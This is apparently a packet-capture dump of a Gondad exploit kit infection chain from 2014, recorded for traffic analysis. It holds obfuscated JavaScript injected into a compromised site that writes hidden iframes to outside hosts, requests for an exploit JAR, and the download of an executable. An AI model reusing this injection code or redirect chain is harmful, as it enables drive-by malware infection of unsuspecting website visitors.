PCAP Converted Traffic Sample Gondad Exploit Kit

July 13, 2015

2014-12-13 16:53:26.092318 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [.], ack 1, win 64240, length 0
E..().@…D…..n-.]. .P..u.@. .P…u,……..
2014-12-13 16:53:26.093193 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 1:549, ack 1, win 64240, length 548
E..L).@…A…..n-.]. .P..u.@. .P….j..GET / HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.bing[.]com/search?q=gilsangart[.]com&src=IE-SearchBox&FORM=IE8SRC
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gilsangart[.]com
Connection: Keep-Alive
2014-12-13 16:53:26.093207 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], ack 549, win 64240, length 0
E..(h…..E.n-.]…..P. @. …w.P…s………
2014-12-13 16:53:26.856355 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [P.], seq 1:1370, ack 549, win 64240, length 1369
E…hU….?en-.]…..P. @. …w.P…H…HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15012
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASBDBQQQ=BKCFPKACJCEJGKCIHPPFIKBD; path=/
Cache-control: private

2014-12-13 16:53:28.032272 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 549:935, ack 15258, win 64240, length 386
E…).@…B…..n-.]. .P..w.@.\.P….]..GET /include/flashWrite.js HTTP/1.1
Accept: */*
Referer: http://gilsangart[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gilsangart[.]com
Connection: Keep-Alive
Cookie: ASPSESSIONIDASBDBQQQ=BKCFPKACJCEJGKCIHPPFIKBD
2014-12-13 16:53:28.032466 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], ack 935, win 64240, length 0
E..(h…..D4n-.]…..P. @.\…y=P…5………
2014-12-13 16:53:28.424896 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], seq 15258:16718, ack 935, win 64240, length 1460
E…i…..>^n-.]…..P. @.\…y=P…VB..HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 1392
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Feb 2009 08:22:40 GMT
Accept-Ranges: bytes
ETag: "0c859e7218cc91:3f1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 13 Dec 2014 20:53:27 GMT
}
var _$=['\x78\x69\x61\x6f\x3d','\x78\x69\x61\x6f\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x67\x6f\x6d\x67\x6f\x6d\x69\x2e\x63\x6f\x6d\x2f\x70\x67\x2f\x6b\x63\x70\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x
2014-12-13 16:53:28.424906 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [P.], seq 16718:16942, ack 935, win 64240, length 224
E…i…..C1n-.]…..P. @.b8..y=P…`S..67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(document.cookie.indexOf(_$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie=_$[1]+a.toGMTString();document.write(_$[2])}

2014-12-13 16:53:28.428838 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 935:1330, ack 16942, win 64240, length 395
E…).@…Bs….n-.]. .P..y=@.c.P…*…GET /images/main03_01.jpg HTTP/1.1
Accept: */*
Referer: http://gilsangart[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gilsangart[.]com
Connection: Keep-Alive
Cookie: ASPSESSIONIDASBDBQQQ=BKCFPKACJCEJGKCIHPPFIKBD; xiao=Yes
2014-12-13 16:53:28.428842 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], ack 1330, win 64240, length 0
E..(i…..D.n-.]…..P. @.c…z.P…-………
2014-12-13 16:53:28.823059 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [P.], seq 16942:18311, ack 1330, win 64240, length 1369
E…i-….>.n-.]…..P. @.c…z.P….B..HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 36144
Content-Type: image/jpeg
Last-Modified: Wed, 11 Feb 2009 08:21:11 GMT
Accept-Ranges: bytes
ETag: "80754db2218cc91:3f1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 13 Dec 2014 20:53:28 GMT

……JFIF…..d.d……Ducky…….d……Adobe.d……………………………………………………………………………………………………………………………….n……………………………….

2014-12-13 16:53:29.605854 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [.], ack 41584, win 64240, length 0
E..();@…C…..n-.]. .P..z.@..ZP………….
2014-12-13 16:53:29.626606 IP 119.205.211.101.80 > 192.168.204.137.49679: Flags [.], seq 1:1461, ack 513, win 64240, length 1460
E…i…….w..e…..P..v]{.!..#P…DZ..HTTP/1.1 404 Not Found
Date: Sat, 13 Dec 2014 20:53:30 GMT
Content-Length: 1466
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>…….. …. .. ………</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=ks_c_5601-1987">
<STYLE type="text/css">
BODY { font: 9pt/12pt …. }
H1 { font: 13pt/15pt …. }
H2 { font: 9pt/12pt …. }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

2014-12-13 16:53:30.457900 IP 192.168.204.137.49681 > 221.141.1.80.80: Flags [P.], seq 1:517, ack 1, win 64240, length 516
E..,)`@…c\…….P…P.&.6“g{P….0..GET /popup/index.html HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://gilsangart[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.d-mama.co[.]kr
Connection: Keep-Alive

2014-12-13 16:53:30.460901 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 1330:1752, ack 53366, win 63410, length 422
E…)b@…B…..n-.]. .P..z.@..`P…….GET /images/banner.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://gilsangart[.]com/
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: gilsangart[.]com
Connection: Keep-Alive
Cookie: ASPSESSIONIDASBDBQQQ=BKCFPKACJCEJGKCIHPPFIKBD; xiao=Yes
2014-12-13 16:53:30.460906 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [.], ack 1752, win 64240, length 0
E..(jR….B.n-.]…..P. @..`..|nP………….
2014-12-13 16:53:30.857431 IP 110.45.146.93.80 > 192.168.204.137.49673: Flags [P.], seq 53366:54735, ack 1752, win 64240, length 1369
E…j…..=.n-.]…..P. @..`..|nP…u…HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 85503
Content-Type: application/x-shockwave-flash
Last-Modified: Wed, 18 Mar 2009 13:46:34 GMT
Accept-Ranges: bytes
ETag: "01960f3cfa7c91:3f1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 13 Dec 2014 20:53:29 GMT

2014-12-13 16:53:30.858857 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [.], ack 62949, win 64240, length 0
E..()z@…C…..n-.]. .P..|n@…P…xp……..
2014-12-13 16:53:30.860068 IP 221.141.1.80.80 > 192.168.204.137.49681: Flags [P.], seq 1:962, ack 517, win 64240, length 961
E…j…..`K…P…..P..“g{.&.:P…….HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:45:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 718
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDSARTC=CJGIIGECCBHIMGDFNCJPPPED; path=/
Cache-control: private

var _$=['\x78\x69\x61\x6f\x3d','\x78\x69\x61\x6f\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x6e\x67\x68\x77\x61\x73\x75\x2e\x63\x6f\x6d\x2f\x6d\x79\x2f\x62\x79\x34\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(document.cookie.indexOf(_$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie=_$[1]+a.toGMTString();document.write(_$[2])}

2014-12-13 16:53:31.707864 IP 192.168.204.137.49683 > 211.239.157.117.80: Flags [P.], seq 1:527, ack 1, win 64240, length 526
E..6).@….a…….u…Px.`.Z…P…….GET /my/by4.html HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.d-mama.co[.]kr/popup/index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: songhwasu[.]com
Connection: Keep-Alive

2014-12-13 16:53:32.084319 IP 211.239.157.117.80 > 192.168.204.137.49683: Flags [P.], seq 1:1029, ack 527, win 64240, length 1028
E..,lL………u…..P..Z…x.b.P…~]..HTTP/1.1 200 OK
Content-Length: 778
Content-Type: text/html
Last-Modified: Fri, 12 Dec 2014 09:43:44 GMT
Accept-Ranges: bytes
ETag: "2faf91ef015d01:2cc1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 13 Dec 2014 20:53:32 GMT

2014-12-13 16:53:34.651371 IP 192.168.204.137.49686 > 211.202.2.110.80: Flags [P.], seq 1:534, ack 1, win 64240, length 533
E..=*k@…j……..n…PZ.kBN.d2P…….GET /data/file/cr/index.html HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://songhwasu[.]com/my/by4.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: comm.sansung.org
Connection: Keep-Alive
2014-12-13 16:53:34.651382 IP 211.202.2.110.80 > 192.168.204.137.49686: Flags [.], ack 534, win 64240, length 0
E..(n…..iW…n…..P..N.d2Z.mWP………….
2014-12-13 16:53:35.066302 IP 211.202.2.110.80 > 192.168.204.137.49686: Flags [P.], seq 1:1370, ack 534, win 64240, length 1369
E…nF….c….n…..P..N.d2Z.mWP…m`..HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:30 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
X-Powered-By: PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2014-12-13 16:53:35.532309 IP 192.168.204.137.49687 > 211.202.2.110.80: Flags [P.], seq 1:363, ack 1, win 64240, length 362
E…*.@…k|…….n…P..KV4.4.P…….GET /data/file/cr/swfobject.js HTTP/1.1
Accept: */*
Referer: http://comm.sansung.org/data/file/cr/index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: comm.sansung.org
Connection: Keep-Alive
2014-12-13 16:53:35.532322 IP 211.202.2.110.80 > 192.168.204.137.49687: Flags [.], ack 363, win 64240, length 0
E..(n~….h….n…..P..4.4…L.P…L………
2014-12-13 16:53:35.532412 IP 192.168.204.137.49688 > 211.202.2.110.80: Flags [P.], seq 1:370, ack 1, win 64240, length 369
E…*.@…kt…….n…P(}..=03.P…….GET /data/file/cr/jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Referer: http://comm.sansung.org/data/file/cr/index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: comm.sansung.org
Connection: Keep-Alive
2014-12-13 16:53:35.532418 IP 211.202.2.110.80 > 192.168.204.137.49688: Flags [.], ack 370, win 64240, length 0
E..(n…..h….n…..P..=03.(}..P………….
2014-12-13 16:53:36.004093 IP 211.202.2.110.80 > 192.168.204.137.49688: Flags [P.], seq 1:1370, ack 370, win 64240, length 1369
E…n…..cO…n…..P..=03.(}..P…
…HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:31 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Last-Modified: Sat, 13 Dec 2014 03:08:37 GMT
ETag: "6460129-4dab-548badb5"
Accept-Ranges: bytes
Content-Length: 19883
Connection: close
Content-Type: application/javascript
2014-12-13 16:53:36.819225 IP 192.168.204.137.49692 > 211.202.2.110.80: Flags [P.], seq 1:611, ack 1, win 64240, length 610
E…*.@…jN…….n…P.v.?0l4.P…F6..GET /data/file/cr/main.html HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://comm.sansung.org/data/file/cr/index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: comm.sansung.org
Connection: Keep-Alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes

2014-12-13 16:53:37.246864 IP 211.202.2.110.80 > 192.168.204.137.49692: Flags [P.], seq 1:1370, ack 611, win 64240, length 1369
E…o…..bj…n…..P..0l4..v
.P…….HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:32 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
X-Powered-By: PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2014-12-13 16:53:37.802143 IP 192.168.204.137.49693 > 23.248.253.123.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
E../*.@…,I…….{…P0..G.._.P…z…GET /windos.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 23.248.253.123
Connection: Keep-Alive
2014-12-13 16:53:38.081561 IP 23.248.253.123.80 > 192.168.204.137.49693: Flags [P.], seq 1:230, ack 264, win 64240, length 229
E…p9….’….{…..P…._.0..NP…….HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Sat, 13 Dec 2014 20:53:39 GMT
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Sun, 13 Dec 2014 15:07:04 GMT
Content-Length: 144896
2014-12-13 16:53:38.082517 IP 23.248.253.123.80 > 192.168.204.137.49693: Flags [P.], seq 230:1599, ack 264, win 64240, length 1369
E…p:….”….{…..P….`.0..NP….7..MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2014-12-13 16:53:52.615083 IP 192.168.204.137.49694 > 211.202.2.110.80: Flags [.], ack 1, win 64240, length 0
E..(+.@…k……..n…P..{…<.P….D……..
2014-12-13 16:53:52.622283 IP 192.168.204.137.49694 > 211.202.2.110.80: Flags [P.], seq 1:349, ack 1, win 64240, length 348
E…+.@…jN…….n…P..{…<.P….%..GET /data/file/cr/AyVpSf.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: comm.sansung.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes
2014-12-13 16:53:52.622326 IP 211.202.2.110.80 > 192.168.204.137.49694: Flags [.], ack 349, win 64240, length 0
E..(w….._….n…..P….<…}$P………….
2014-12-13 16:53:53.035237 IP 211.202.2.110.80 > 192.168.204.137.49694: Flags [P.], seq 1:1370, ack 349, win 64240, length 1369
E…x…..Z….n…..P….<…}$P…….HTTP/1.1 200 OK
Date: Sat, 13 Dec 2014 20:53:48 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Last-Modified: Sat, 13 Dec 2014 03:08:33 GMT
ETag: "6460128-1942-548badb1"
Accept-Ranges: bytes
Content-Length: 6466
Connection: close
Content-Type: text/plain

2014-12-13 16:53:54.476545 IP 192.168.204.137.49696 > 211.202.2.110.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268
E..4+.@…j……..n. .P..uQ ?\.P…t…GET /data/file/cr/edu.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: comm.sansung.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes
2014-12-13 16:53:54.476550 IP 211.202.2.110.80 > 192.168.204.137.49696: Flags [.], ack 269, win 64240, length 0
E..(x…..^….n…..P. ?\…v]P….W……..
2014-12-13 16:53:54.939079 IP 211.202.2.110.80 > 192.168.204.137.49696: Flags [FP.], seq 1:527, ack 269, win 64240, length 526
E..6x…..\….n…..P. ?\…v]P…IG..HTTP/1.1 404 Not Found
Date: Sat, 13 Dec 2014 20:53:50 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

2014-12-13 16:53:55.374435 IP 192.168.204.137.49697 > 211.202.2.110.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268
E..4+.@…j……..n.!.P8\.[/Gt.P…….GET /data/file/cr/net.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: comm.sansung.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes
2014-12-13 16:53:55.374488 IP 211.202.2.110.80 > 192.168.204.137.49697: Flags [.], ack 269, win 64240, length 0
E..(x…..^m…n…..P.!/Gt.8\.gP….i……..
2014-12-13 16:53:55.798179 IP 211.202.2.110.80 > 192.168.204.137.49697: Flags [FP.], seq 1:527, ack 269, win 64240, length 526
E..6y!….\6…n…..P.!/Gt.8\.gP…aX..HTTP/1.1 404 Not Found
Date: Sat, 13 Dec 2014 20:53:50 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

2014-12-13 16:53:56.213820 IP 192.168.204.137.49698 > 211.202.2.110.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268
E..4+.@…j……..n.”.P> ..B K^P…
U..GET /data/file/cr/org.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: comm.sansung.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: cck_lasttime=1418504017194; cck_count=0; nb284710=Yes
2014-12-13 16:53:56.213860 IP 211.202.2.110.80 > 192.168.204.137.49698: Flags [.], ack 269, win 64240, length 0
E..(yK….^….n…..P.”B K^> ..P…;………
2014-12-13 16:53:56.625624 IP 211.202.2.110.80 > 192.168.204.137.49698: Flags [FP.], seq 1:527, ack 269, win 64240, length 526
E..6yt….[….n…..P.”B K^> ..P…….HTTP/1.1 404 Not Found
Date: Sat, 13 Dec 2014 20:53:51 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.6m PHP/5.2.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
